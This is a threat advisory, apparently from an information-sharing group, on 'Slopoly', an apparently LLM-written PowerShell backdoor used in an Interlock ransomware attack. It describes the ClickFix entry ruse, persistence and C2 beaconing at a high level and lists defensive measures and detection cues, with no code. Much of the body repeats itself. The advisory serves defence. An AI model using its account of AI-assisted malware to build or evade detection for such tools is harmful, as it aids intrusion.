AI-Generated Slopoly Malware Used in Interlock Ransomware Attack
Summary:
IBM X-Force has identified a new malware strain dubbed "Slopoly," which represents a significant milestone in the evolution of offensive AI. Attributed to the financially motivated threat group Hive0163, the malware was recently deployed during an Interlock ransomware attack. Slopoly is a PowerShell-based backdoor that functions as a Command and Control (C2) persistence client. While the malware itself is not technically advanced, its code structure—characterized by unusually detailed comments, verbose logging, and highly structured error handling—strongly suggests it was authored or heavily assisted by a Large Language Model (LLM).
The attack chain typically begins with a "ClickFix" social engineering ruse, leading to the deployment of Slopoly in the C:\ProgramData\Microsoft\Windows\Runtime\ directory. Once active, the script collects system information, establishes persistence, and beacons to a C2 server every 30 to 50 seconds to receive and execute remote commands. Despite being marketed in its own code as "polymorphic," researchers found no evidence of self-modification, suggesting that the "polymorphism" may simply refer to the AI's ability to generate slightly varied iterations of the same script to evade static signatures.
Security Officer Comments:
The emergence of Slopoly is a "canary in the coal mine" for the commoditization of custom malware. Historically, creating unique, functional backdoors required a specific level of coding expertise; however, Slopoly demonstrates that AI is effectively lowering the barrier to entry for lower-tier threat actors. By using LLMs, even unsophisticated attackers can rapidly iterate on scripts that bypass traditional, signature-based antivirus solutions that rely on known "malicious" patterns.
The impact on our member base is twofold. First, the speed of the "attacker lifecycle" is accelerating. Because AI can generate dozens of variations of a script like Slopoly in seconds, defenders can no longer rely on static Indicators of Compromise (IoCs) like file hashes. Second, the use of PowerShell for these AI-generated scripts allows attackers to "live off the land," using legitimate administrative tools to mask their presence. For organizations, especially those in manufacturing or critical infrastructure where legacy systems may be prevalent, this means that even a "simple" script can facilitate long-term dwell time and eventual data exfiltration if behavior-based detection is not prioritized.
Suggested Corrections:
X-Force recommends defenders:
Some additional recommendations to defend against AI-enhanced threats like Slopoly, organizations should adopt a multi-layered defense strategy focused on behavioral detection and environment hardening:
Link(s):
https://www.bleepingcomputer.com/ne...-malware-used-in-interlock-ransomware-attack/
IBM X-Force has identified a new malware strain dubbed "Slopoly," which represents a significant milestone in the evolution of offensive AI. Attributed to the financially motivated threat group Hive0163, the malware was recently deployed during an Interlock ransomware attack. Slopoly is a PowerShell-based backdoor that functions as a Command and Control (C2) persistence client. While the malware itself is not technically advanced, its code structure—characterized by unusually detailed comments, verbose logging, and highly structured error handling—strongly suggests it was authored or heavily assisted by a Large Language Model (LLM).
The attack chain typically begins with a "ClickFix" social engineering ruse, leading to the deployment of Slopoly in the C:\ProgramData\Microsoft\Windows\Runtime\ directory. Once active, the script collects system information, establishes persistence, and beacons to a C2 server every 30 to 50 seconds to receive and execute remote commands. Despite being marketed in its own code as "polymorphic," researchers found no evidence of self-modification, suggesting that the "polymorphism" may simply refer to the AI's ability to generate slightly varied iterations of the same script to evade static signatures.
Security Officer Comments:
The emergence of Slopoly is a "canary in the coal mine" for the commoditization of custom malware. Historically, creating unique, functional backdoors required a specific level of coding expertise; however, Slopoly demonstrates that AI is effectively lowering the barrier to entry for lower-tier threat actors. By using LLMs, even unsophisticated attackers can rapidly iterate on scripts that bypass traditional, signature-based antivirus solutions that rely on known "malicious" patterns.
The impact on our member base is twofold. First, the speed of the "attacker lifecycle" is accelerating. Because AI can generate dozens of variations of a script like Slopoly in seconds, defenders can no longer rely on static Indicators of Compromise (IoCs) like file hashes. Second, the use of PowerShell for these AI-generated scripts allows attackers to "live off the land," using legitimate administrative tools to mask their presence. For organizations, especially those in manufacturing or critical infrastructure where legacy systems may be prevalent, this means that even a "simple" script can facilitate long-term dwell time and eventual data exfiltration if behavior-based detection is not prioritized.
Suggested Corrections:
X-Force recommends defenders:
- Implement security measures against ClickFix, such as disabling the “Win+R” command, or monitoring the RunMRU registry key.
- Prioritize behavior-based detections as opposed to relying on signature-based or malware-specific detection mechanisms.
- Hunt for the Hive0163-associated IoCs below in your environment.
Some additional recommendations to defend against AI-enhanced threats like Slopoly, organizations should adopt a multi-layered defense strategy focused on behavioral detection and environment hardening:
- Implement Behavioral Monitoring (EDR/XDR): Since Slopoly's static signature can be easily changed by an AI re-write, focus on detecting its behaviors. Monitor for PowerShell scripts initiating outbound network connections to unknown IPs or executing encoded commands from uncommon directories like \\ProgramData\\.
- Enforce PowerShell Constrained Language Mode: Restrict the capabilities of PowerShell to prevent the execution of advanced functions often used by backdoors while still allowing legitimate administrative tasks to function.
- Audit "ClickFix" and Social Engineering: Conduct targeted user awareness training regarding "ClickFix" lures—which often masquerade as browser updates or "fix-it" buttons—as these remain the primary entry point for Hive0163.
- Log and Monitor Script Execution: Enable enhanced PowerShell logging (Script Block Logging and Module Logging) to capture the full content of executed scripts. This is critical for identifying the "verbose" and "comment-heavy" code structures indicative of AI-generated malware.
- Restrict Persistence Locations: Monitor and restrict write access to common persistence directories such as C:\\ProgramData\\Microsoft\\Windows\\Runtime\\ and ensure that any new service or scheduled task creation triggers an immediate alert for the SOC.
Link(s):
https://www.bleepingcomputer.com/ne...-malware-used-in-interlock-ransomware-attack/